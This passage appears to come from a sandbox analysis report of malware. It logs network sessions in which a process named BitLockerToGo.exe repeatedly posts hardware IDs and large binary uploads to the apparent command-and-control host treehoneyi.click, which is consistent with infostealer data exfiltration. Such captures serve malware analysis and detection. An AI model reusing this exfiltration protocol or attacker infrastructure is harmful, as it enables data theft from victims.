                                                                                                                    Data Ascii: --QN7TZRE36WBContent-Disposition: form-data; name="hwid"C170C44A5D1ABD98AC8923850305D13E--QN7TZRE36WBContent-Disposition: form-data; name="pid"2--QN7TZRE36WBContent-Disposition: form-data; name="lid"rAGxSF--sheev--QN7TZRE36WBCont
                                                                                                                    2024-12-26 11:01:30 UTC2790OUTData Raw: 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52
                                                                                                                    Data Ascii: f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
2024-12-26 11:01:31 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:01:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=l706ihauukhrigbame83rh6i3r; expires=Mon, 21 Apr 2025 04:48:09 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=InEgV%2FS92SYTCq5TGLxGBMiiPtLTHw43AZcAlmqnDwwB21Ozv1%2BiTin14Nrxs6Ca17oU62u2jPM9IR4frsWR1UGv6leJlq7bgC4bFJ35TnVofz2Q35ydmrkk9oH1gN%2F2K31x"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8092c0ba3a0cb2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1676&rtt_var=647&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2841&recv_bytes=19076&delivery_rate=1668571&cwnd=152&unsent_bytes=0&cid=171f731c888d22ac&ts=1030&x=0"
2024-12-26 11:01:31 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 11:01:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 172.67.180.113 | 443 | 7676 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:01:32 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=NZKI1E0ZV4QP4CG2X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8778
Host: treehoneyi.click
                                                                                                                    2024-12-26 11:01:32 UTC8778OUTData Raw: 2d 2d 4e 5a 4b 49 31 45 30 5a 56 34 51 50 34 43 47 32 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 37 30 43 34 34 41 35 44 31 41 42 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4e 5a 4b 49 31 45 30 5a 56 34 51 50 34 43 47 32 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 5a 4b 49 31 45 30 5a 56 34 51 50 34 43 47 32 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 73 68 65 65 76 0d 0a 2d
                                                                                                                    Data Ascii: --NZKI1E0ZV4QP4CG2XContent-Disposition: form-data; name="hwid"C170C44A5D1ABD98AC8923850305D13E--NZKI1E0ZV4QP4CG2XContent-Disposition: form-data; name="pid"2--NZKI1E0ZV4QP4CG2XContent-Disposition: form-data; name="lid"rAGxSF--sheev-
2024-12-26 11:01:33 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:01:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ejikdraqvih6k1l1k64ciqah0f; expires=Mon, 21 Apr 2025 04:48:12 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mQnIXWqdHrczHOx7rfHMKAGew813K6ZlYqRDIBMEQG1ePl66UjPbx2kdemOTlPRDAiL1T8ZUIG%2FDRaD8x75OV1V5dERP6%2B3m%2BcT25HS5DJ85GDUMgkk4rvKDWwdH5%2BSqC9D1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8092d0ccb8422b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1588&rtt_var=598&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9716&delivery_rate=1838790&cwnd=220&unsent_bytes=0&cid=f150aa23cd81a8e9&ts=813&x=0"
2024-12-26 11:01:33 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 11:01:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 172.67.180.113 | 443 | 7676 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:01:35 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=5WUKJX71OLLRGG
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20413
Host: treehoneyi.click
                                                                                                                    2024-12-26 11:01:35 UTC15331OUTData Raw: 2d 2d 35 57 55 4b 4a 58 37 31 4f 4c 4c 52 47 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 37 30 43 34 34 41 35 44 31 41 42 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 57 55 4b 4a 58 37 31 4f 4c 4c 52 47 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 57 55 4b 4a 58 37 31 4f 4c 4c 52 47 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 73 68 65 65 76 0d 0a 2d 2d 35 57 55 4b 4a 58 37 31
                                                                                                                    Data Ascii: --5WUKJX71OLLRGGContent-Disposition: form-data; name="hwid"C170C44A5D1ABD98AC8923850305D13E--5WUKJX71OLLRGGContent-Disposition: form-data; name="pid"3--5WUKJX71OLLRGGContent-Disposition: form-data; name="lid"rAGxSF--sheev--5WUKJX71
                                                                                                                    2024-12-26 11:01:35 UTC5082OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-26 11:01:36 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:01:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=dv5pqjosnu5cgqvv7mhu17musu; expires=Mon, 21 Apr 2025 04:48:15 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=faerNI4YKpLpqlfjlzTihsenbjD6ADgANf%2BOJ3QQrlWlxzaZxQnHwtqtVO8kkJ45AwyqSlRGHx%2BnrrgnkjgU7IDH01gZ4NwL6bnAv166uquD2ZNnORoxUnxWT%2BseAr11s8vL"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8092e19a5242e0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1617&rtt_var=621&sent=16&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21371&delivery_rate=1740166&cwnd=252&unsent_bytes=0&cid=0c9d69f819a029f9&ts=988&x=0"
2024-12-26 11:01:36 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 11:01:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 172.67.180.113 | 443 | 7676 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:01:37 UTC | 276 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=UYZYJ2CR9XWAI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1244
Host: treehoneyi.click
                                                                                                                    2024-12-26 11:01:37 UTC1244OUTData Raw: 2d 2d 55 59 5a 59 4a 32 43 52 39 58 57 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 37 30 43 34 34 41 35 44 31 41 42 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 59 5a 59 4a 32 43 52 39 58 57 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 59 5a 59 4a 32 43 52 39 58 57 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 73 68 65 65 76 0d 0a 2d 2d 55 59 5a 59 4a 32 43 52 39 58 57
                                                                                                                    Data Ascii: --UYZYJ2CR9XWAIContent-Disposition: form-data; name="hwid"C170C44A5D1ABD98AC8923850305D13E--UYZYJ2CR9XWAIContent-Disposition: form-data; name="pid"1--UYZYJ2CR9XWAIContent-Disposition: form-data; name="lid"rAGxSF--sheev--UYZYJ2CR9XW
2024-12-26 11:01:38 UTC | 1138 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:01:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=4d64ta7ou3j3148lemi21b6439; expires=Mon, 21 Apr 2025 04:48:17 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wda%2F%2Ff1vbD%2FguDntWo9s%2F%2BqDzGDAaBwXOKct5z0q9jk%2B0r%2BydihK%2BbwTZK3gVGFsN3FUwTdmX%2BWzYCSHBNZTPRYdXYDtGxRQobdVbhU77BSwwVECXn94S5N%2FsN%2BFnx8TmOUQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8092f1af837c96-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1977&rtt_var=755&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2156&delivery_rate=1436301&cwnd=173&unsent_bytes=0&cid=0826e0cf2385b53d&ts=845&x=0"
2024-12-26 11:01:38 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 11:01:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49742 | 172.67.180.113 | 443 | 7676 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:01:40 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=5CCKHBLPQDP6JKKB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 573418
Host: treehoneyi.click
2024-12-26 11:01:40 UTC | 15331 | OUT | Data Raw: 2d 2d 35 43 43 4b 48 42 4c 50 51 44 50 36 4a 4b 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 37 30 43 34 34 41 35 44 31 41 42 44 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 43 43 4b 48 42 4c 50 51 44 50 36 4a 4b 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 43 43 4b 48 42 4c 50 51 44 50 36 4a 4b 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 72 41 47 78 53 46 2d 2d 73 68 65 65 76 0d 0a 2d 2d 35 43
Data Ascii: --5CCKHBLPQDP6JKKBContent-Disposition: form-data; name="hwid"C170C44A5D1ABD98AC8923850305D13E--5CCKHBLPQDP6JKKBContent-Disposition: form-data; name="pid"1--5CCKHBLPQDP6JKKBContent-Disposition: form-data; name="lid"rAGxSF--sheev--5C
2024-12-26 11:01:40 UTC | 15331 | OUT | Data Raw: 25 6b e6 7e 14 00 da c4 af 83 da e5 c5 73 37 72 7d 27 6c 54 83 a7 5f 07 12 80 75 3f d3 bb 70 b9 4e 85 cd bc 7e 95 ca c8 0a dd ef 0f a1 c0 f3 f3 14 aa d8 79 ca 4e c0 ff 0b 0f 4b a3 23 f6 24 42 c9 fa c0 30 5b 16 28 cd cb 73 dc c5 57 c3 2d 7b 72 e6 0b 8f 80 e0 d6 77 ee 62 60 75 21 c2 c1 41 9e 8e df 4a f9 ff 57 18 1a 7e 05 d8 1d e6 68 96 32 32 e1 a1 77 83 68 d8 53 19 6c 83 43 62 c2 71 c4 11 b5 5a 77 e6 d8 36 cc ea a1 6a 61 b0 04 c4 63 ce 9f b3 b0 c2 82 8f 74 c4 5a 5c 74 8d 08 7a a5 08 54 ae 37 8f 62 c5 29 47 13 82 86 71 0c 16 40 1d e1 77 37 c2 5f 7f ca fb e3 0c 76 f1 60 13 7b 4f 76 c8 02 5e 25 82 47 fd e7 43 66 f1 6a 76 9b 21 6a 59 c9 97 1d 80 be ec 82 48 d6 8c b5 9c ee 5e e9 96 e3 52 65 c2 80 15 f2 50 62 60 bf 64 a8 d9 bc 55 e7 75 be b9 24 2e b1 2f 34 04 44
Data Ascii: %k~s7r}'lT_u?pN~yNK#$B0[(sW-{rwb`u!AJW~h22whSlCbqZw6jactZ\tzT7b)Gq@w7_v`{Ov^%GCfjv!jYH^RePb`dUu$./4D
2024-12-26 11:01:40 UTC | 15331 | OUT | Data Raw: fe b3 47 d7 d4 e6 fa 23 9b d9 44 10 92 e8 b9 f5 96 b4 e3 fb 9f 5e 19 4c 10 76 5a ba 0e 47 2f e8 80 2e aa 53 34 6a 3d d4 b2 5a 78 a2 af 6a e2 37 66 1f 19 a3 75 c9 8c 4a 66 13 46 68 46 00 ce 4b b5 9f 93 9d 54 ca ec a5 cf aa 86 df 7e 92 6c cd e5 ac a3 11 2a 33 dd 36 86 fa 2c 92 9b 44 3b 03 a4 67 43 e3 9b fe 91 34 16 3a cd d7 3a c3 ba ba 4a 87 e3 d4 46 6b 12 c0 62 3a 9d 34 a2 34 9c 69 7d 43 f9 20 bc 66 1e 65 9d 48 f2 c7 51 30 f3 fb 2f 75 3f 33 9a 89 de dd 6e 0d 87 b4 9a c5 2f 7f c6 c6 fb 07 f2 fc 06 c9 ae cc 5e d9 c3 4e 17 95 c3 03 b7 51 66 87 1f c4 52 7a c5 5c fc 45 f7 bc dc cd cb f2 b7 1b 17 0e 9b 3f b3 b7 8b 74 17 23 ec 5a cd 56 10 1e 31 c8 bc 6b 22 00 8b 13 83 c5 c5 bc ce 6f 39 12 16 03 57 bd 80 34 ea b3 7e ee 0f 32 96 92 76 90 59 b2 9c aa 27 70 9a 7f fc
Data Ascii: G#D^LvZG/.S4j=Zxj7fuJfFhFKT~l*36,D;gC4::JFkb:44i}C feHQ0/u?3n/^NQfRz\E?t#ZV1k"o9W4~2vY'p
2024-12-26 11:01:40 UTC | 15331 | OUT | Data Raw: 97 47 24 cf a1 89 af a4 28 3e 1b 6e 93 0a 09 51 64 9d fd d8 3d e0 fc 7e 62 12 20 c4 6f 35 00 1c d5 f5 db 57 c3 03 f5 64 99 e3 e1 fe f2 c4 03 5c df 9d c2 d2 20 0c 0d cd 90 f0 45 1d 02 e7 69 d9 3d 06 e8 39 1b 6b 8b 25 89 01 99 c8 70 71 e6 37 9c cb b3 f1 33 74 66 5f 99 0f 3f 6e 45 ca 2c 4e 4a 58 be e9 87 a9 28 e2 13 3f 4a 1d 6b de ba 50 74 64 e4 28 b0 d0 b1 00 39 1a 28 4d b3 3c 9a d0 39 4c 8a a7 66 36 e0 f8 95 28 28 55 49 6f ed 05 9f 35 10 aa e0 f5 8e 5a 68 db a0 13 8a 3c 3d 57 eb 27 98 15 bf 3e d6 a4 4b 41 f9 fb 2c ec 4d fd c9 fb de d3 a8 12 2b 51 62 6d 4d 07 dc d4 64 c8 2c 1e b9 2a 3f 2c e6 cb ec 1b c3 72 05 a0 6e 95 71 7f 76 97 d5 d1 a2 9f a1 a3 0f 5d de 03 26 d2 f0 32 5c 17 e9 2f d2 cd af c9 85 4b 77 c4 43 84 d6 a9 a2 4d 9e 2d 3b de 97 f9 86 46 b9 f1 5f
Data Ascii: G$(>nQd=~b o5Wd\ Ei=9k%pq73tf_?nE,NJX(?JkPtd(9(M<9Lf6((UIo5Zh<=W'>KA,M+QbmMd,*?,rnqv]&2\/KwCM-;F_
2024-12-26 11:01:40 UTC | 15331 | OUT | Data Raw: 78 0c 63 6a 1b c9 30 15 4d 21 62 db 13 0f 1b c3 e4 cb 54 07 09 2d 84 d1 0d 73 e5 ea 91 6b af 8a 12 7f b9 00 23 13 a3 86 48 cd 6d 0f 12 42 64 f7 39 5e a6 e8 e7 5f 2c 52 b8 a3 30 0c 57 22 d2 46 49 50 96 1e 07 03 74 2d 93 36 c5 c1 7b f7 c2 eb a7 09 2e 18 ee 7b cf 43 a5 56 bb b6 c8 69 52 f0 5b 8c 55 a7 af fc da 32 df 9f a5 b7 69 f2 d1 95 2b 46 11 d3 58 c4 14 1c 51 be eb 5a 9b c1 15 56 f2 22 e5 d3 2f 62 d8 08 d2 cc 06 f1 b2 f0 4c 7a 38 2f 27 f0 5e 5b d9 ee 8d 87 cf 28 ad eb 9b e6 35 b7 88 ff 73 2e f6 82 3d 94 1f 1d ff a1 29 aa ec 61 24 04 2e 30 e8 b3 1b f7 66 93 70 49 ea 49 04 9f b9 d6 c7 2e b1 82 4a 66 a7 36 b3 1e 8a a9 19 a5 31 05 19 6d ff 62 7d 04 69 03 19 c7 cb 32 65 b8 03 e0 c8 fc bf fd 14 ff bf 87 5e d7 bf db 70 9a 29 34 75 c4 a0 0c b0 eb 44 0c be af 2c
Data Ascii: xcj0M!bT-sk#HmBd9^_,R0W"FIPt-6{.{CViR[U2i+FXQZV"/bLz8/'^[(5s.=)a$.0fpII.Jf61mb}i2e^p)4uD,
2024-12-26 11:01:40 UTC | 15331 | OUT | Data Raw: ed 13 3b c4 b8 36 91 96 41 da d0 fd 21 bf b3 34 c1 9d 8b 9f 62 c2 57 58 1d 9b 99 de 50 27 6f 96 37 28 5a ac 35 85 7d 55 34 f4 d4 2c 45 05 a3 37 3f 8f 24 ec 93 8d 08 2c e6 89 70 2e 12 e8 11 8d ee d9 c8 0b 2e 26 aa 6a 2c 20 5a 57 31 79 38 73 c6 73 33 7d 15 6d 15 3b 7b a8 8e fb 07 e8 a8 11 c0 c6 cb 35 66 b5 90 2e f3 a1 7a 70 0d a9 a6 a1 3b cc aa 0d 99 25 87 3a 18 87 02 77 38 88 e3 2c 83 2d e7 04 5e 88 58 e8 fb 24 3c b4 bd 4b fc de 9c cd 4b 08 8e c9 bd 3d bc 7a dc 67 a3 ad 92 48 af e5 29 b3 eb 77 38 35 81 3f 77 0c f8 2b e3 98 d2 8f e6 ef dd 73 20 6c fd e1 74 0e 5d f9 3d 74 63 c3 19 d0 8f 75 db 69 c5 83 fc ee c5 b8 69 4e d0 f1 22 7a 88 b7 07 86 cf 81 40 10 74 64 32 5b 45 57 a6 53 2c d5 93 ce 2f cf 53 67 d0 f5 69 01 26 1a d1 cb 3b e4 14 3f 48 fa a2 91 5e 75 f1
Data Ascii: ;6A!4bWXP'o7(Z5}U4,E7?$,p..&j, ZW1y8ss3}m;{5f.zp;%:w8,-^X$<KK=zgH)w85?w+s lt]=tcuiiN"z@td2[EWS,/Sgi&;?H^u
2024-12-26 11:01:40 UTC | 15331 | OUT | Data Raw: 31 36 56 fc 2f 39 a6 d6 87 af e5 78 28 3e 86 88 df 49 16 5b d0 a7 9d 04 63 ee c5 98 8d d6 2a 85 dd f1 3f 34 19 f2 cf 8c d6 db 0f 86 56 a7 64 cd d8 f3 0a 5f b4 a6 da d2 4d e6 07 86 59 3f 86 cf 68 33 b7 e7 49 5b ce e7 ff a8 22 85 02 39 eb 6e 43 bb f1 33 14 ed 9b 59 d9 3f 68 d8 93 a9 c3 18 e6 95 40 a4 e0 72 27 1f 28 46 bd 57 06 41 cc 07 07 32 ba 35 dd 1f df 9d 1b 52 8f 04 74 fe cb 1c b0 cd 31 fa cd 03 77 c0 e2 ab e1 dd 69 39 ba 6b 20 cd d4 59 05 bc b9 c7 8d 92 f2 66 12 48 86 89 15 b6 72 a7 92 3e 48 60 ea c9 5e eb 02 79 d3 ee 36 17 c7 7f bb cc b7 1f 9f 37 0c 4e 11 43 57 6e 36 64 f4 85 09 9d 0f 76 e4 d9 11 ad 18 7a d3 6e bd e6 5f 25 9a 2a f5 c2 af 43 e4 41 cc 40 71 eb 7b c3 40 8f fd eb 7a bb 23 a1 29 99 20 3f e4 c7 b9 cc bf c9 2e 17 8c 98 5f 78 7d 79 41 5e df
Data Ascii: 16V/9x(>I[c*?4Vd_MY?h3I["9nC3Y?h@r'(FWA25Rt1wi9k YfHr>H`^y67NCWn6dvzn_%*CA@q{@z#) ?._x}yA^
2024-12-26 11:01:40 UTC | 15331 | OUT | Data Raw: 6a af 7f 3f f9 e1 f7 23 81 ba 6d fa c9 7a b5 84 68 46 f6 ec f2 88 79 f3 35 fc c3 d1 9d 97 ff 49 6c 67 33 aa 28 da bb a6 5e f1 1f 4a 5d b0 b0 5b 32 af 83 04 73 6d af bc 80 cb 87 ef 82 4e f4 28 0a a5 41 ec 40 67 23 fc 6e 65 5c 21 e9 6c 1e 4d b6 82 af 40 a9 2e 10 9d b2 17 1c 5d 90 9c 13 03 e2 57 d1 29 22 9a be bb 40 06 85 32 dc 81 19 e2 da 77 df f4 e0 04 64 84 32 a3 8f 1f 78 23 21 bb 1e bf 70 18 e5 7d 80 43 50 b1 28 62 e8 07 48 bb 24 d0 1f 43 bd 8d a0 5c 39 4d 3b 77 dc b4 d6 17 e0 dc ff f4 60 38 8b d0 43 72 13 b6 a0 95 75 d9 f1 68 e2 79 96 83 5c d4 8f a9 be e3 af 41 6e 0b 59 b9 b1 5e 79 bf b1 d4 33 9c a6 98 60 05 56 b3 0b 71 98 d6 2d 1e ab 09 33 ba 31 fe cf 58 d6 29 02 ec a3 a3 f8 df 70 02 a8 56 ec 80 3f b3 4b 3d 86 d3 07 7b 10 f6 89 92 57 a1 69 24 0e 44 3f
Data Ascii: j?#mzhFy5Ilg3(^J][2smN(A@g#ne\!lM@.]W)"@2wd2x#!p}CP(bH$C\9M;w`8Cruhy\AnY^y3`Vq-31X)pV?K={Wi$D?
